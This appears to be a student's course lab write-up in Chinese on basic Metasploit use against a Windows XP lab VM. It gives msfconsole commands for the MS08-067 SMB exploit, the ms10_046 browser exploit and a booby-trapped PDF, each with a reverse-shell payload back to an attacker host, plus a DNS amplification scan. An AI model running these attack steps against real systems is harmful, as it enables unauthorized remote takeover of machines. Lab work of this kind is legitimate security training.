Exp5 MSF基础应用

一个主动攻击实践,MS08-067

  • 首先利用msfconsole启用msf终端

  • 然后利用search MS08-067搜索漏洞,会显示相应漏洞模块

如图:

  • 根据上图,我们输入use exploit/windows/smb/ms08_067_netapi,选择相应的模块

  • 然后我们可以使用show payloads,查看可以使用的模块

如图:

  • 然后根据上图,为获取靶机的shell,所以利用set payload generic/shell_reverse_tcp

  • 然后输入show options,查看配置信息,知道我们需要配置RHOST,LHOST,LPORT,target

    如图:

  • 输入

set RHOST 192.168.241.138
set LHOST 192.168.241.134
set LPORT 5210

进行配置

  • 然后我们再次利用show options,查看配置信息

    如图:

  • 然后exploit进行监听

如图:

  • 如果出现如下情况,关闭防火墙,就可以解决

针对浏览器的攻击,ms10_046

  • 起初我打算做ms11_050,攻击IE浏览器,但是IE8.0版本,不能成功,可能是IE8.0已经修复相关漏洞了。

  • 所以我选择了ms10_046,首先输入search ms10_046查找漏洞

如图:

  • 由于我们要对浏览器进行攻击,所以我们输入use use exploit/windows/browser/ms10_046_shortcut_icon_

  • 然后我们输入show payloads,查看载荷进行选择,这里我仍用实验一中的载荷set payload generic/shell_reverse_tcp

如图:

  • 我们利用show options查询需要配置的有,LPORT,LHOST,SRVHOST

  • 输入

set SRVHOST 192.168.241.134
set LHOST 192.168.241.134
set LPORT 5210

进行配置

  • 再次查看配置信息

如图:

  • 然后输入exploit生成URL

如图:

  • 在windows端访问该URL,kali端如图:

  • 输入sessions,可看到一个ID为1的连接

    如图:

  • 然后输入session -i 1,接入ID为1的连接,输入shell,获取成功。

    如图:

针对客户端的攻击

  • 首先还是先利用search adobe进行搜索

    如图:

  • 然后进行选择,我选择的是use windows/fileformat/adobe_flashplayer_button

  • 然后set payload windows/meterpreter/reverse_tcp,设置所用荷载,利用show options查看所要配置的信息

    如图:

  • 输入如下代码,对LHOST,LPORT,FILENAME进行配置

set LHOST 192.168.241.134
set LPORT 5210
set FILENAME 20155210.pdf
  • 输入exploit,生成20155210.pdf文件

    如图:

  • 输入use exploit/multi/handler,进入监听,并设置监听端口,主机号

  • 在windows端,打开20155210.pdf,成功回连

    如图:

辅助模块应用

  • 首先利用show auxiliary,查看辅助模块

  • 我选择的是scanner/dns/dns_amp,扫描dns

  • 输入show options,查看配置

  • 输入exploit进行监听

基础问题

  • 用自己的话解释什么是exploit,payload,encode

  • exploit:针对靶机的漏洞,利用靶机中的后门,对靶机进行攻击

  • payload:相当于shellcode前身,也就是后门的模板

  • encode:对payload进行编码

实验体会

我们应该尽可能的,去更新最新版的软件和系统,否则就会给黑客可乘之机。

比如,我们做的实验都是基于xp系统的,但是如果对win7、8、10,进行攻击则无效。

比如,我在做实验2时,想做老师给的例子,但是那个漏洞对IE8.0不好使。

我们没有一个可以针对现用系统或者软件的渗透攻击库,离实战还是很远的

20155210 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165232 Exp5 MSF基础应用

    2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

  2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

    - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

  5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

    目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

  7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

    <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

  8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

  9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

    2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

  1. AOP编程 - 淘宝京东网络处理

    现象描述 当我们打开京东 app 进入首页,如果当前是没有网络的状态,里面的按钮点击是没有反应的.只有当我们打开网络的情况下,点击按钮才能跳转页面,按照我们一般人写代码的逻辑应该是这个样子: /** ...

  2. android控件跟随手势滑动改变位置

    要求:1.通过手指移动来拖动图片   2.控制图片不能超出屏幕显示区域 技术点:1.MotionEvent处理2.对View进行动态定位(layout) activity_main.xml: < ...

  3. Expo大作战(七)--expo如何使用Genymotion模拟器

    简要:本系列文章讲会对expo进行全面的介绍,本人从2017年6月份接触expo以来,对expo的研究断断续续,一路走来将近10个月,废话不多说,接下来你看到内容,将全部来与官网 我猜去全部机翻+个人 ...

  4. JS前端创建CSV或Excel文件并浏览器导出下载

    长期以来,在做文件下载功能的时候都是前端通过ajax把需要生成的文件的内容参数传递给后端,后端通过Java语言将文件生成在服务器,然后返回一个文件下载的连接地址url.前端通过location.hre ...

  5. go语言练习:接口

    package main import ( "fmt" ) type Run interface { //这个接口的名字命名成Car更直观一点,除了distance方法外,后面可以 ...

  6. XML与DataSet的相互转换

    转:https://www.cnblogs.com/kunEssay/p/6168824.html XML与DataSet的相互转换的类 一.XML与DataSet的相互转换的类 using Syst ...

  7. Azure 门户中基于角色的访问控制入门

    面向安全的公司应侧重于向员工提供他们所需的确切权限. 权限过多,可能会向攻击者公开帐户. 权限太少意味着员工无法有效地完成其工作. Azure 基于角色的访问控制 (RBAC) 可通过为 Azure ...

  8. 转:双向链表dblinklist

    数据结构C#版笔记--双向链表(DbLinkList)   这是数据结构C#版笔记--线性表(Data Structure)之单链表(LinkList)的继续,对于双向链接,节点上除了Next属性外, ...

  9. Tmux 使用教程 on Fedora 28

    Tmux 和 gun/screen 都是优秀的终端复用软件,它的关键的好处就是,保持ssh 登录连接session不中断,并且能支持分屏操作,具备丰富的命令行参数,可以进行动态布局和操作.可以看作为s ...

  10. ubuntu下如何设置中文输入法

    许多朋友在用ubuntu操作系统时,因没有中文输入法而苦恼!今天我就和大家分享一下如何在ubuntu下设置如输入法的简单方法: 1 在任务栏的右上角设置选项-——>system settings ...